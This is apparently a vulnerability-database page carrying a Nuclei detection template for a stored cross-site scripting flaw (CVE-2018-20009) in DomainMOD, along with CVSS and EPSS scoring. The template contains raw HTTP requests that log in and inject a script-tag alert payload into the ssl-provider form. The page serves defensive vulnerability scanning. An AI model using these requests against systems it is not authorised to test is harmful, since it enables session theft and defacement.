Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-20009
HistoryJul 07, 2022 - 1:46 p.m.

DomainMOD 4.11.01 - Cross-Site Scripting

2022-07-0713:46:30
ProjectDiscovery
github.com
4

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

4.8 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

47.5%

DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters.
id: CVE-2018-20009

info:
  name: DomainMOD 4.11.01 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://github.com/domainmod/domainmod/issues/88
    - https://www.exploit-db.com/exploits/46372/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-20009
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2018-20009
    cwe-id: CWE-79
    epss-score: 0.00126
    epss-percentile: 0.47199
    cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: domainmod
    product: domainmod
  tags: cve,cve2018,domainmod,xss,authenticated,edb

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_username={{username}}&new_password={{password}}
      - |
        POST /assets/add/ssl-provider.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=
      - |
        GET /assets/ssl-providers.php HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(header_3, "text/html")'
          - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
        condition: and
# digest: 4a0a00473045022100af0ae3cbc2a555217c64dff7da257aeb9cfbae5552ff0f531b5b20c3672028cd022057d92c9509347c4bab862fe765ae5dd01ac0bd3a52932e1fce59f3299a038292:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

4.8 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

47.5%